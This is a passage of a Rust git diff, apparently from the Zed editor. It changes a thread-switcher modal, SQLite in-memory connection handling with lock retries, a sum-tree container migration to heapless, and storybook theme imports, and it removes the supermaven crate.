entry.workspace.clone(), + }); + } + + let focus_handle = cx.focus_handle(); + cx.on_focus_out(&focus_handle, window, |_this, _event, _window, cx| { + cx.emit(ThreadSwitcherEvent::Dismissed); + cx.emit(DismissEvent); + }) + .detach(); + + Self { + focus_handle, + entries, + selected_index, + init_modifiers, + } + } + + pub fn selected_entry(&self) -> Option<&ThreadSwitcherEntry> { + self.entries.get(self.selected_index) + } + + #[cfg(test)] + pub fn entries(&self) -> &[ThreadSwitcherEntry] { + &self.entries + } + + #[cfg(test)] + pub fn selected_index(&self) -> usize { + self.selected_index + } + + pub fn cycle_selection(&mut self, cx: &mut Context) { + if self.entries.is_empty() { + return; + } + self.selected_index = (self.selected_index + 1) % self.entries.len(); + self.emit_preview(cx); + } + + pub fn select_last(&mut self, cx: &mut Context) { + if self.entries.is_empty() { + return; + } + if self.selected_index == 0 { + self.selected_index = self.entries.len() - 1; + } else { + self.selected_index -= 1; + } + self.emit_preview(cx); + } + + fn emit_preview(&mut self, cx: &mut Context) { + if let Some(entry) = self.entries.get(self.selected_index) { + cx.emit(ThreadSwitcherEvent::Preview { + metadata: entry.metadata.clone(), + workspace: entry.workspace.clone(), + }); + } + } + + fn confirm(&mut self, _: &menu::Confirm, _window: &mut gpui::Window, cx: &mut Context) { + if let Some(entry) = self.entries.get(self.selected_index) { + cx.emit(ThreadSwitcherEvent::Confirmed { + metadata: entry.metadata.clone(), + workspace: entry.workspace.clone(), + }); + } + cx.emit(DismissEvent); + } + + fn cancel(&mut self, _: &menu::Cancel, _window: &mut gpui::Window, cx: &mut Context) { + cx.emit(ThreadSwitcherEvent::Dismissed); + cx.emit(DismissEvent); + } + + fn toggle( + &mut self, + action: &ToggleThreadSwitcher, + _window: &mut gpui::Window, + cx: &mut Context, + ) { + if action.select_last { + self.select_last(cx); + } else { + self.cycle_selection(cx); + } + } + + fn 
handle_modifiers_changed( + &mut self, + event: &ModifiersChangedEvent, + window: &mut gpui::Window, + cx: &mut Context, + ) { + let Some(init_modifiers) = self.init_modifiers else { + return; + }; + if !event.modified() || !init_modifiers.is_subset_of(event) { + self.init_modifiers = None; + if self.entries.is_empty() { + cx.emit(DismissEvent); + } else { + window.dispatch_action(menu::Confirm.boxed_clone(), cx); + } + } + } +} + +impl ModalView for ThreadSwitcher {} + +impl EventEmitter for ThreadSwitcher {} +impl EventEmitter for ThreadSwitcher {} + +impl Focusable for ThreadSwitcher { + fn focus_handle(&self, _cx: &gpui::App) -> FocusHandle { + self.focus_handle.clone() + } +} + +impl Render for ThreadSwitcher { + fn render(&mut self, _window: &mut gpui::Window, cx: &mut Context) -> impl IntoElement { + let selected_index = self.selected_index; + + v_flex() + .key_context("ThreadSwitcher") + .track_focus(&self.focus_handle) + .w(rems_from_px(440.)) + .p_1p5() + .gap_0p5() + .elevation_3(cx) + .on_modifiers_changed(cx.listener(Self::handle_modifiers_changed)) + .on_action(cx.listener(Self::confirm)) + .on_action(cx.listener(Self::cancel)) + .on_action(cx.listener(Self::toggle)) + .children(self.entries.iter().enumerate().map(|(ix, entry)| { + let id = SharedString::from(format!("thread-switcher-{}", entry.session_id)); + + ThreadItem::new(id, entry.title.clone()) + .rounded(true) + .icon(entry.icon) + .status(entry.status) + .when_some(entry.icon_from_external_svg.clone(), |this, svg| { + this.custom_icon_from_external_svg(svg) + }) + .when_some(entry.project_name.clone(), |this, name| { + this.project_name(name) + }) + .worktrees(entry.worktrees.clone()) + .timestamp(entry.timestamp.clone()) + .title_generating(entry.is_title_generating) + .notified(entry.notified) + .when(entry.diff_stats.lines_added > 0, |this| { + this.added(entry.diff_stats.lines_added as usize) + }) + .when(entry.diff_stats.lines_removed > 0, |this| { + 
this.removed(entry.diff_stats.lines_removed as usize) + }) + .selected(ix == selected_index) + .base_bg(cx.theme().colors().surface_background) + .into_any_element() + })) + } +} diff --git a/crates/sqlez/src/connection.rs b/crates/sqlez/src/connection.rs index 53f0d4e2614f340cc0563d5cd9374bdc3626d9bb..fb3194aaf428f9848b858b104e94de60765d6f9a 100644 --- a/crates/sqlez/src/connection.rs +++ b/crates/sqlez/src/connection.rs @@ -18,7 +18,7 @@ pub struct Connection { unsafe impl Send for Connection {} impl Connection { - pub(crate) fn open(uri: &str, persistent: bool) -> Result { + fn open_with_flags(uri: &str, persistent: bool, flags: i32) -> Result { let mut connection = Self { sqlite3: ptr::null_mut(), persistent, @@ -26,7 +26,6 @@ impl Connection { _sqlite: PhantomData, }; - let flags = SQLITE_OPEN_CREATE | SQLITE_OPEN_NOMUTEX | SQLITE_OPEN_READWRITE; unsafe { sqlite3_open_v2( CString::new(uri)?.as_ptr(), @@ -44,6 +43,14 @@ impl Connection { Ok(connection) } + pub(crate) fn open(uri: &str, persistent: bool) -> Result { + Self::open_with_flags( + uri, + persistent, + SQLITE_OPEN_CREATE | SQLITE_OPEN_NOMUTEX | SQLITE_OPEN_READWRITE, + ) + } + /// Attempts to open the database at uri. If it fails, a shared memory db will be opened /// instead. 
pub fn open_file(uri: &str) -> Self { @@ -51,13 +58,17 @@ impl Connection { } pub fn open_memory(uri: Option<&str>) -> Self { - let in_memory_path = if let Some(uri) = uri { - format!("file:{}?mode=memory&cache=shared", uri) + if let Some(uri) = uri { + let in_memory_path = format!("file:{}?mode=memory&cache=shared", uri); + return Self::open_with_flags( + &in_memory_path, + false, + SQLITE_OPEN_CREATE | SQLITE_OPEN_NOMUTEX | SQLITE_OPEN_READWRITE | SQLITE_OPEN_URI, + ) + .expect("Could not create fallback in memory db"); } else { - ":memory:".to_string() - }; - - Self::open(&in_memory_path, false).expect("Could not create fallback in memory db") + Self::open(":memory:", false).expect("Could not create fallback in memory db") + } } pub fn persistent(&self) -> bool { @@ -265,9 +276,50 @@ impl Drop for Connection { mod test { use anyhow::Result; use indoc::indoc; + use std::{ + fs, + sync::atomic::{AtomicUsize, Ordering}, + }; use crate::connection::Connection; + static NEXT_NAMED_MEMORY_DB_ID: AtomicUsize = AtomicUsize::new(0); + + fn unique_named_memory_db(prefix: &str) -> String { + format!( + "{prefix}_{}_{}", + std::process::id(), + NEXT_NAMED_MEMORY_DB_ID.fetch_add(1, Ordering::Relaxed) + ) + } + + fn literal_named_memory_paths(name: &str) -> [String; 3] { + let main = format!("file:{name}?mode=memory&cache=shared"); + [main.clone(), format!("{main}-wal"), format!("{main}-shm")] + } + + struct NamedMemoryPathGuard { + paths: [String; 3], + } + + impl NamedMemoryPathGuard { + fn new(name: &str) -> Self { + let paths = literal_named_memory_paths(name); + for path in &paths { + let _ = fs::remove_file(path); + } + Self { paths } + } + } + + impl Drop for NamedMemoryPathGuard { + fn drop(&mut self) { + for path in &self.paths { + let _ = fs::remove_file(path); + } + } + } + #[test] fn string_round_trips() -> Result<()> { let connection = Connection::open_memory(Some("string_round_trips")); @@ -382,6 +434,41 @@ mod test { assert_eq!(read_blobs, vec![blob]); } + 
#[test] + fn named_memory_connections_do_not_create_literal_backing_files() { + let name = unique_named_memory_db("named_memory_connections_do_not_create_backing_files"); + let guard = NamedMemoryPathGuard::new(&name); + + let connection1 = Connection::open_memory(Some(&name)); + connection1 + .exec(indoc! {" + CREATE TABLE shared ( + value INTEGER + )"}) + .unwrap()() + .unwrap(); + connection1 + .exec("INSERT INTO shared (value) VALUES (7)") + .unwrap()() + .unwrap(); + + let connection2 = Connection::open_memory(Some(&name)); + assert_eq!( + connection2 + .select_row::("SELECT value FROM shared") + .unwrap()() + .unwrap(), + Some(7) + ); + + for path in &guard.paths { + assert!( + fs::metadata(path).is_err(), + "named in-memory database unexpectedly created backing file {path}" + ); + } + } + #[test] fn multi_step_statement_works() { let connection = Connection::open_memory(Some("multi_step_statement_works")); diff --git a/crates/sqlez/src/thread_safe_connection.rs b/crates/sqlez/src/thread_safe_connection.rs index 966f14a9c2f244780da7190aebac88e95c7ac068..7b3630cdf65f900469e3d7544f3bd75b33250625 100644 --- a/crates/sqlez/src/thread_safe_connection.rs +++ b/crates/sqlez/src/thread_safe_connection.rs @@ -7,12 +7,15 @@ use std::{ ops::Deref, sync::{Arc, LazyLock}, thread, + time::Duration, }; use thread_local::ThreadLocal; use crate::{connection::Connection, domain::Migrator, util::UnboundedSyncSender}; const MIGRATION_RETRIES: usize = 10; +const CONNECTION_INITIALIZE_RETRIES: usize = 50; +const CONNECTION_INITIALIZE_RETRY_DELAY: Duration = Duration::from_millis(1); type QueuedWrite = Box; type WriteQueue = Box; @@ -197,21 +200,54 @@ impl ThreadSafeConnection { Self::open_shared_memory(uri) }; + if let Some(initialize_query) = connection_initialize_query { + let mut last_error = None; + let initialized = (0..CONNECTION_INITIALIZE_RETRIES).any(|attempt| { + match connection + .exec(initialize_query) + .and_then(|mut statement| statement()) + { + Ok(()) => true, + 
Err(err) + if is_schema_lock_error(&err) + && attempt + 1 < CONNECTION_INITIALIZE_RETRIES => + { + last_error = Some(err); + thread::sleep(CONNECTION_INITIALIZE_RETRY_DELAY); + false + } + Err(err) => { + panic!( + "Initialize query failed to execute: {}\n\nCaused by:\n{err:#}", + initialize_query + ) + } + } + }); + + if !initialized { + let err = last_error + .expect("connection initialization retries should record the last error"); + panic!( + "Initialize query failed to execute after retries: {}\n\nCaused by:\n{err:#}", + initialize_query + ); + } + } + // Disallow writes on the connection. The only writes allowed for thread safe connections // are from the background thread that can serialize them. *connection.write.get_mut() = false; - if let Some(initialize_query) = connection_initialize_query { - connection.exec(initialize_query).unwrap_or_else(|_| { - panic!("Initialize query failed to execute: {}", initialize_query) - })() - .unwrap() - } - connection } } +fn is_schema_lock_error(err: &anyhow::Error) -> bool { + let message = format!("{err:#}"); + message.contains("database schema is locked") || message.contains("database is locked") +} + impl ThreadSafeConnection { /// Special constructor for ThreadSafeConnection which disallows db initialization and migrations. /// This allows construction to be infallible and not write to the db. 
@@ -282,7 +318,7 @@ mod test { use indoc::indoc; use std::ops::Deref; - use std::thread; + use std::{thread, time::Duration}; use crate::{domain::Domain, thread_safe_connection::ThreadSafeConnection}; @@ -318,38 +354,21 @@ mod test { } #[test] - #[should_panic] - fn wild_zed_lost_failure() { - enum TestWorkspace {} - impl Domain for TestWorkspace { - const NAME: &str = "workspace"; - - const MIGRATIONS: &[&str] = &[" - CREATE TABLE workspaces( - workspace_id INTEGER PRIMARY KEY, - dock_visible INTEGER, -- Boolean - dock_anchor TEXT, -- Enum: 'Bottom' / 'Right' / 'Expanded' - dock_pane INTEGER, -- NULL indicates that we don't have a dock pane yet - timestamp TEXT DEFAULT CURRENT_TIMESTAMP NOT NULL, - FOREIGN KEY(dock_pane) REFERENCES panes(pane_id), - FOREIGN KEY(active_pane) REFERENCES panes(pane_id) - ) STRICT; - - CREATE TABLE panes( - pane_id INTEGER PRIMARY KEY, - workspace_id INTEGER NOT NULL, - active INTEGER NOT NULL, -- Boolean - FOREIGN KEY(workspace_id) REFERENCES workspaces(workspace_id) - ON DELETE CASCADE - ON UPDATE CASCADE - ) STRICT; - "]; - } - - let builder = - ThreadSafeConnection::builder::("wild_zed_lost_failure", false) - .with_connection_initialize_query("PRAGMA FOREIGN_KEYS=true"); - - smol::block_on(builder.build()).unwrap(); + fn connection_initialize_query_retries_transient_schema_lock() { + let name = "connection_initialize_query_retries_transient_schema_lock"; + let locking_connection = crate::connection::Connection::open_memory(Some(name)); + locking_connection.exec("BEGIN IMMEDIATE").unwrap()().unwrap(); + locking_connection + .exec("CREATE TABLE test(col TEXT)") + .unwrap()() + .unwrap(); + + let releaser = thread::spawn(move || { + thread::sleep(Duration::from_millis(10)); + locking_connection.exec("ROLLBACK").unwrap()().unwrap(); + }); + + ThreadSafeConnection::create_connection(false, name, Some("PRAGMA FOREIGN_KEYS=true")); + releaser.join().unwrap(); } } diff --git a/crates/storybook/Cargo.toml b/crates/storybook/Cargo.toml 
index b1d512559526a00021f5339707c1e24a3110ff15..b641e5cbd8b5ce5e66f9fb082e74ea42124f8993 100644 --- a/crates/storybook/Cargo.toml +++ b/crates/storybook/Cargo.toml @@ -29,6 +29,7 @@ picker.workspace = true reqwest_client.workspace = true rust-embed.workspace = true settings.workspace = true +theme_settings.workspace = true simplelog.workspace = true story.workspace = true strum = { workspace = true, features = ["derive"] } diff --git a/crates/storybook/src/app_menus.rs b/crates/storybook/src/app_menus.rs index 4e84b4c85da8b7ce3d9227ae174f842b4b1f9ce4..c3045cf7999b851245a2f540c6318b7d0ef57b4f 100644 --- a/crates/storybook/src/app_menus.rs +++ b/crates/storybook/src/app_menus.rs @@ -3,8 +3,5 @@ use gpui::{Menu, MenuItem}; pub fn app_menus() -> Vec { use crate::actions::Quit; - vec![Menu { - name: "Storybook".into(), - items: vec![MenuItem::action("Quit", Quit)], - }] + vec![Menu::new("Storybook").items([MenuItem::action("Quit", Quit)])] } diff --git a/crates/storybook/src/storybook.rs b/crates/storybook/src/storybook.rs index b8f659146c29162c25b94ca65d05770b4c08921b..d3df9bbc3a078793ab8e00c71cd4cb5cb9810fa6 100644 --- a/crates/storybook/src/storybook.rs +++ b/crates/storybook/src/storybook.rs @@ -15,10 +15,10 @@ use gpui::{ }; use log::LevelFilter; use reqwest_client::ReqwestClient; -use settings::{KeymapFile, Settings}; +use settings::{KeymapFile, Settings as _}; use simplelog::SimpleLogger; use strum::IntoEnumIterator; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::prelude::*; use crate::app_menus::app_menus; @@ -76,13 +76,13 @@ fn main() { cx.set_http_client(Arc::new(http_client)); settings::init(cx); - theme::init(theme::LoadThemes::All(Box::new(Assets)), cx); + theme_settings::init(theme::LoadThemes::All(Box::new(Assets)), cx); let selector = story_selector; let mut theme_settings = ThemeSettings::get_global(cx).clone(); theme_settings.theme = - theme::ThemeSelection::Static(settings::ThemeName(theme_name.into())); + 
theme_settings::ThemeSelection::Static(settings::ThemeName(theme_name.into())); ThemeSettings::override_global(theme_settings, cx); editor::init(cx); @@ -98,7 +98,7 @@ fn main() { ..Default::default() }, move |window, cx| { - theme::setup_ui_font(window, cx); + theme_settings::setup_ui_font(window, cx); cx.new(|cx| StoryWrapper::new(selector.story(window, cx))) }, diff --git a/crates/sum_tree/Cargo.toml b/crates/sum_tree/Cargo.toml index 3e06ede162dad37f94017207ccbd6ee5c38f26a5..8392baa4678b1f635b1c6955fad50acd76576e86 100644 --- a/crates/sum_tree/Cargo.toml +++ b/crates/sum_tree/Cargo.toml @@ -14,16 +14,22 @@ path = "src/sum_tree.rs" doctest = false [dependencies] -arrayvec = "0.7.1" +heapless.workspace = true rayon.workspace = true log.workspace = true ztracing.workspace = true tracing.workspace = true +proptest = { workspace = true, optional = true } [dev-dependencies] ctor.workspace = true rand.workspace = true +proptest.workspace = true zlog.workspace = true + [package.metadata.cargo-machete] ignored = ["tracing"] + +[features] +test-support = ["proptest"] \ No newline at end of file diff --git a/crates/sum_tree/src/cursor.rs b/crates/sum_tree/src/cursor.rs index 494ecbe049993e58357cf5d5606ea8d6624126c4..ec2ded5fcfcdc8400607c64b79ef8712e84e26fc 100644 --- a/crates/sum_tree/src/cursor.rs +++ b/crates/sum_tree/src/cursor.rs @@ -1,5 +1,5 @@ use super::*; -use arrayvec::ArrayVec; +use heapless::Vec as ArrayVec; use std::{cmp::Ordering, mem, sync::Arc}; use ztracing::instrument; @@ -29,7 +29,7 @@ impl fmt::Debug for StackEntry<'_, T, D> { #[derive(Clone)] pub struct Cursor<'a, 'b, T: Item, D> { tree: &'a SumTree, - stack: ArrayVec, 16>, + stack: ArrayVec, 16, u8>, pub position: D, did_seek: bool, at_end: bool, @@ -53,7 +53,7 @@ where pub struct Iter<'a, T: Item> { tree: &'a SumTree, - stack: ArrayVec, 16>, + stack: ArrayVec, 16, u8>, } impl<'a, 'b, T, D> Cursor<'a, 'b, T, D> @@ -231,11 +231,13 @@ where self.position = D::zero(self.cx); self.at_end = 
self.tree.is_empty(); if !self.tree.is_empty() { - self.stack.push(StackEntry { - tree: self.tree, - index: self.tree.0.child_summaries().len() as u32, - position: D::from_summary(self.tree.summary(), self.cx), - }); + self.stack + .push(StackEntry { + tree: self.tree, + index: self.tree.0.child_summaries().len() as u32, + position: D::from_summary(self.tree.summary(), self.cx), + }) + .unwrap_oob(); } } @@ -267,11 +269,13 @@ where Node::Internal { child_trees, .. } => { if descending { let tree = &child_trees[entry.index()]; - self.stack.push(StackEntry { - position: D::zero(self.cx), - tree, - index: tree.0.child_summaries().len() as u32 - 1, - }) + self.stack + .push(StackEntry { + position: D::zero(self.cx), + tree, + index: tree.0.child_summaries().len() as u32 - 1, + }) + .unwrap_oob(); } } Node::Leaf { .. } => { @@ -297,11 +301,13 @@ where if self.stack.is_empty() { if !self.at_end { - self.stack.push(StackEntry { - tree: self.tree, - index: 0, - position: D::zero(self.cx), - }); + self.stack + .push(StackEntry { + tree: self.tree, + index: 0, + position: D::zero(self.cx), + }) + .unwrap_oob(); descend = true; } self.did_seek = true; @@ -361,11 +367,13 @@ where if let Some(subtree) = new_subtree { descend = true; - self.stack.push(StackEntry { - tree: subtree, - index: 0, - position: self.position.clone(), - }); + self.stack + .push(StackEntry { + tree: subtree, + index: 0, + position: self.position.clone(), + }) + .unwrap_oob(); } else { descend = false; self.stack.pop(); @@ -467,11 +475,13 @@ where if !self.did_seek { self.did_seek = true; - self.stack.push(StackEntry { - tree: self.tree, - index: 0, - position: D::zero(self.cx), - }); + self.stack + .push(StackEntry { + tree: self.tree, + index: 0, + position: D::zero(self.cx), + }) + .unwrap_oob(); } let mut ascending = false; @@ -503,11 +513,13 @@ where entry.index += 1; entry.position = self.position.clone(); } else { - self.stack.push(StackEntry { - tree: child_tree, - index: 0, - position: 
self.position.clone(), - }); + self.stack + .push(StackEntry { + tree: child_tree, + index: 0, + position: self.position.clone(), + }) + .unwrap_oob(); ascending = false; continue 'outer; } @@ -578,11 +590,13 @@ impl<'a, T: Item> Iterator for Iter<'a, T> { let mut descend = false; if self.stack.is_empty() { - self.stack.push(StackEntry { - tree: self.tree, - index: 0, - position: (), - }); + self.stack + .push(StackEntry { + tree: self.tree, + index: 0, + position: (), + }) + .unwrap_oob(); descend = true; } @@ -611,11 +625,13 @@ impl<'a, T: Item> Iterator for Iter<'a, T> { if let Some(subtree) = new_subtree { descend = true; - self.stack.push(StackEntry { - tree: subtree, - index: 0, - position: (), - }); + self.stack + .push(StackEntry { + tree: subtree, + index: 0, + position: (), + }) + .unwrap_oob(); } else { descend = false; self.stack.pop(); @@ -748,8 +764,8 @@ trait SeekAggregate<'a, T: Item> { struct SliceSeekAggregate { tree: SumTree, - leaf_items: ArrayVec, - leaf_item_summaries: ArrayVec, + leaf_items: ArrayVec, + leaf_item_summaries: ArrayVec, leaf_summary: T::Summary, } @@ -786,8 +802,8 @@ impl SeekAggregate<'_, T> for SliceSeekAggregate { summary: &T::Summary, cx: ::Context<'_>, ) { - self.leaf_items.push(item.clone()); - self.leaf_item_summaries.push(summary.clone()); + self.leaf_items.push(item.clone()).unwrap_oob(); + self.leaf_item_summaries.push(summary.clone()).unwrap_oob(); Summary::add_summary(&mut self.leaf_summary, summary, cx); } fn push_tree( diff --git a/crates/sum_tree/src/property_test.rs b/crates/sum_tree/src/property_test.rs new file mode 100644 index 0000000000000000000000000000000000000000..d6c6bd76f94704c60dfc6919fa02ba66c19f349d --- /dev/null +++ b/crates/sum_tree/src/property_test.rs @@ -0,0 +1,32 @@ +use core::fmt::Debug; + +use proptest::{prelude::*, sample::SizeRange}; + +use crate::{Item, SumTree, Summary}; + +impl Arbitrary for SumTree +where + T: Debug + Arbitrary + Item + 'static, + T::Summary: Debug + Summary = ()>, +{ + 
type Parameters = (); + type Strategy = BoxedStrategy; + + fn arbitrary_with((): Self::Parameters) -> Self::Strategy { + any::>() + .prop_map(|vec| SumTree::from_iter(vec, ())) + .boxed() + } +} + +/// A strategy for producing a [`SumTree`] with a given size. +/// +/// Equivalent to [`proptest::collection::vec`]. +pub fn sum_tree(values: S, size: impl Into) -> impl Strategy> +where + T: Debug + Arbitrary + Item + 'static, + T::Summary: Debug + Summary = ()>, + S: Strategy, +{ + proptest::collection::vec(values, size).prop_map(|vec| SumTree::from_iter(vec, ())) +} diff --git a/crates/sum_tree/src/sum_tree.rs b/crates/sum_tree/src/sum_tree.rs index fa83dd937489f0c52e6c02b83b52112b5ff52ec1..251a194d2c7c984a0caa4d0b478ece41332af6be 100644 --- a/crates/sum_tree/src/sum_tree.rs +++ b/crates/sum_tree/src/sum_tree.rs @@ -1,8 +1,10 @@ mod cursor; +#[cfg(any(test, feature = "test-support"))] +pub mod property_test; mod tree_map; -use arrayvec::ArrayVec; pub use cursor::{Cursor, FilterCursor, Iter}; +use heapless::Vec as ArrayVec; use rayon::iter::{IndexedParallelIterator, IntoParallelIterator, ParallelIterator as _}; use std::marker::PhantomData; use std::mem; @@ -15,6 +17,17 @@ pub const TREE_BASE: usize = 2; #[cfg(not(test))] pub const TREE_BASE: usize = 6; +// Helper for when we cannot use ArrayVec::::push().unwrap() as T doesn't impl Debug +trait CapacityResultExt { + fn unwrap_oob(self); +} + +impl CapacityResultExt for Result<(), T> { + fn unwrap_oob(self) { + self.unwrap_or_else(|_| panic!("item should fit into fixed size ArrayVec")) + } +} + /// An item that can be stored in a [`SumTree`] /// /// Must be summarized by a type that implements [`Summary`] @@ -241,8 +254,9 @@ impl SumTree { let mut iter = iter.into_iter().fuse().peekable(); while iter.peek().is_some() { - let items: ArrayVec = iter.by_ref().take(2 * TREE_BASE).collect(); - let item_summaries: ArrayVec = + let items: ArrayVec = + iter.by_ref().take(2 * TREE_BASE).collect(); + let item_summaries: ArrayVec 
= items.iter().map(|item| item.summary(cx)).collect(); let mut summary = item_summaries[0].clone(); @@ -282,8 +296,8 @@ impl SumTree { }; let child_summary = child_node.summary(); ::add_summary(summary, child_summary, cx); - child_summaries.push(child_summary.clone()); - child_trees.push(child_node); + child_summaries.push(child_summary.clone()).unwrap_oob(); + child_trees.push(child_node.clone()).unwrap_oob(); if child_trees.len() == 2 * TREE_BASE { parent_nodes.extend(current_parent_node.take()); @@ -313,8 +327,8 @@ impl SumTree { .into_par_iter() .chunks(2 * TREE_BASE) .map(|items| { - let items: ArrayVec = items.into_iter().collect(); - let item_summaries: ArrayVec = + let items: ArrayVec = items.into_iter().collect(); + let item_summaries: ArrayVec = items.iter().map(|item| item.summary(cx)).collect(); let mut summary = item_summaries[0].clone(); for item_summary in &item_summaries[1..] { @@ -335,9 +349,9 @@ impl SumTree { .into_par_iter() .chunks(2 * TREE_BASE) .map(|child_nodes| { - let child_trees: ArrayVec, { 2 * TREE_BASE }> = + let child_trees: ArrayVec, { 2 * TREE_BASE }, u8> = child_nodes.into_iter().collect(); - let child_summaries: ArrayVec = child_trees + let child_summaries: ArrayVec = child_trees .iter() .map(|child_tree| child_tree.summary().clone()) .collect(); @@ -661,6 +675,51 @@ impl SumTree { } } + pub fn update_first( + &mut self, + f: impl FnOnce(&mut T), + cx: ::Context<'_>, + ) { + self.update_first_recursive(f, cx); + } + + fn update_first_recursive( + &mut self, + f: impl FnOnce(&mut T), + cx: ::Context<'_>, + ) -> Option { + match Arc::make_mut(&mut self.0) { + Node::Internal { + summary, + child_summaries, + child_trees, + .. 
+ } => { + let first_summary = child_summaries.first_mut().unwrap(); + let first_child = child_trees.first_mut().unwrap(); + *first_summary = first_child.update_first_recursive(f, cx).unwrap(); + *summary = sum(child_summaries.iter(), cx); + Some(summary.clone()) + } + Node::Leaf { + summary, + items, + item_summaries, + } => { + if let Some((item, item_summary)) = + items.first_mut().zip(item_summaries.first_mut()) + { + (f)(item); + *item_summary = item.summary(cx); + *summary = sum(item_summaries.iter(), cx); + Some(summary.clone()) + } else { + None + } + } + } + } + pub fn extent<'a, D: Dimension<'a, T::Summary>>( &'a self, cx: ::Context<'_>, @@ -751,14 +810,16 @@ impl SumTree { ::add_summary(summary, other_node.summary(), cx); let height_delta = *height - other_node.height(); - let mut summaries_to_append = ArrayVec::::new(); - let mut trees_to_append = ArrayVec::, { 2 * TREE_BASE }>::new(); + let mut summaries_to_append = ArrayVec::::new(); + let mut trees_to_append = ArrayVec::, { 2 * TREE_BASE }, u8>::new(); if height_delta == 0 { summaries_to_append.extend(other_node.child_summaries().iter().cloned()); trees_to_append.extend(other_node.child_trees().iter().cloned()); } else if height_delta == 1 && !other_node.is_underflowing() { - summaries_to_append.push(other_node.summary().clone()); - trees_to_append.push(other) + summaries_to_append + .push(other_node.summary().clone()) + .unwrap_oob(); + trees_to_append.push(other).unwrap_oob(); } else { let tree_to_append = child_trees .last_mut() @@ -768,15 +829,17 @@ impl SumTree { child_trees.last().unwrap().0.summary().clone(); if let Some(split_tree) = tree_to_append { - summaries_to_append.push(split_tree.0.summary().clone()); - trees_to_append.push(split_tree); + summaries_to_append + .push(split_tree.0.summary().clone()) + .unwrap_oob(); + trees_to_append.push(split_tree).unwrap_oob(); } } let child_count = child_trees.len() + trees_to_append.len(); if child_count > 2 * TREE_BASE { - let left_summaries: 
ArrayVec<_, { 2 * TREE_BASE }>; - let right_summaries: ArrayVec<_, { 2 * TREE_BASE }>; + let left_summaries: ArrayVec<_, { 2 * TREE_BASE }, u8>; + let right_summaries: ArrayVec<_, { 2 * TREE_BASE }, u8>; let left_trees; let right_trees; @@ -821,7 +884,7 @@ impl SumTree { let left_items; let right_items; let left_summaries; - let right_summaries: ArrayVec; + let right_summaries: ArrayVec; let midpoint = (child_count + child_count % 2) / 2; { @@ -886,8 +949,10 @@ impl SumTree { *child_summaries.first_mut().unwrap() = first.summary().clone(); if let Some(tree) = res { if child_trees.len() < 2 * TREE_BASE { - child_summaries.insert(0, tree.summary().clone()); - child_trees.insert(0, tree); + child_summaries + .insert(0, tree.summary().clone()) + .unwrap_oob(); + child_trees.insert(0, tree).unwrap_oob(); None } else { let new_child_summaries = { @@ -969,7 +1034,7 @@ impl SumTree { .iter() .chain(child_summaries.iter()) .cloned(); - let left_summaries: ArrayVec<_, { 2 * TREE_BASE }> = + let left_summaries: ArrayVec<_, { 2 * TREE_BASE }, u8> = all_summaries.by_ref().take(midpoint).collect(); *child_summaries = all_summaries.collect(); @@ -1018,7 +1083,7 @@ impl SumTree { .iter() .chain(item_summaries.iter()) .cloned(); - let left_summaries: ArrayVec<_, { 2 * TREE_BASE }> = + let left_summaries: ArrayVec<_, { 2 * TREE_BASE }, u8> = all_summaries.by_ref().take(midpoint).collect(); *item_summaries = all_summaries.collect(); @@ -1041,11 +1106,11 @@ impl SumTree { ) -> Self { let height = left.0.height() + 1; let mut child_summaries = ArrayVec::new(); - child_summaries.push(left.0.summary().clone()); - child_summaries.push(right.0.summary().clone()); + child_summaries.push(left.0.summary().clone()).unwrap_oob(); + child_summaries.push(right.0.summary().clone()).unwrap_oob(); let mut child_trees = ArrayVec::new(); - child_trees.push(left); - child_trees.push(right); + child_trees.push(left).unwrap_oob(); + child_trees.push(right).unwrap_oob(); SumTree(Arc::new(Node::Internal { 
height, summary: sum(child_summaries.iter(), cx), @@ -1205,13 +1270,13 @@ pub enum Node { Internal { height: u8, summary: T::Summary, - child_summaries: ArrayVec, - child_trees: ArrayVec, { 2 * TREE_BASE }>, + child_summaries: ArrayVec, + child_trees: ArrayVec, { 2 * TREE_BASE }, u8>, }, Leaf { summary: T::Summary, - items: ArrayVec, - item_summaries: ArrayVec, + items: ArrayVec, + item_summaries: ArrayVec, }, } @@ -1276,14 +1341,14 @@ impl Node { } } - fn child_trees(&self) -> &ArrayVec, { 2 * TREE_BASE }> { + fn child_trees(&self) -> &ArrayVec, { 2 * TREE_BASE }, u8> { match self { Node::Internal { child_trees, .. } => child_trees, Node::Leaf { .. } => panic!("Leaf nodes have no child trees"), } } - fn items(&self) -> &ArrayVec { + fn items(&self) -> &ArrayVec { match self { Node::Leaf { items, .. } => items, Node::Internal { .. } => panic!("Internal nodes have no items"), diff --git a/crates/sum_tree/src/tree_map.rs b/crates/sum_tree/src/tree_map.rs index e58f7a65dd5d13ca67d4433bd25118ffb55d1169..004ec918514e0ad18b3c1e55178a6527866d1bb1 100644 --- a/crates/sum_tree/src/tree_map.rs +++ b/crates/sum_tree/src/tree_map.rs @@ -53,6 +53,10 @@ impl TreeMap { self.0.is_empty() } + pub fn contains_key(&self, key: &K) -> bool { + self.get(key).is_some() + } + pub fn get(&self, key: &K) -> Option<&V> { let (.., item) = self .0 diff --git a/crates/supermaven/Cargo.toml b/crates/supermaven/Cargo.toml deleted file mode 100644 index c2d0c48a9e7733402eae32886c0863326882c134..0000000000000000000000000000000000000000 --- a/crates/supermaven/Cargo.toml +++ /dev/null @@ -1,44 +0,0 @@ -[package] -name = "supermaven" -version = "0.1.0" -edition.workspace = true -publish.workspace = true -license = "GPL-3.0-or-later" - -[lints] -workspace = true - -[lib] -path = "src/supermaven.rs" -doctest = false - -[dependencies] -anyhow.workspace = true -client.workspace = true -collections.workspace = true -edit_prediction_types.workspace = true -futures.workspace = true -gpui.workspace = true 
-language.workspace = true -log.workspace = true -postage.workspace = true -serde.workspace = true -serde_json.workspace = true -settings.workspace = true -smol.workspace = true -supermaven_api.workspace = true -text.workspace = true -ui.workspace = true -unicode-segmentation.workspace = true -util.workspace = true - -[dev-dependencies] -editor = { workspace = true, features = ["test-support"] } -env_logger.workspace = true -gpui = { workspace = true, features = ["test-support"] } -language = { workspace = true, features = ["test-support"] } -project = { workspace = true, features = ["test-support"] } -settings = { workspace = true, features = ["test-support"] } -theme = { workspace = true, features = ["test-support"] } -util = { workspace = true, features = ["test-support"] } -http_client = { workspace = true, features = ["test-support"] } diff --git a/crates/supermaven/src/messages.rs b/crates/supermaven/src/messages.rs deleted file mode 100644 index 9210343587bbb2cbf172a62a2eff73bbbb7cfb72..0000000000000000000000000000000000000000 --- a/crates/supermaven/src/messages.rs +++ /dev/null @@ -1,146 +0,0 @@ 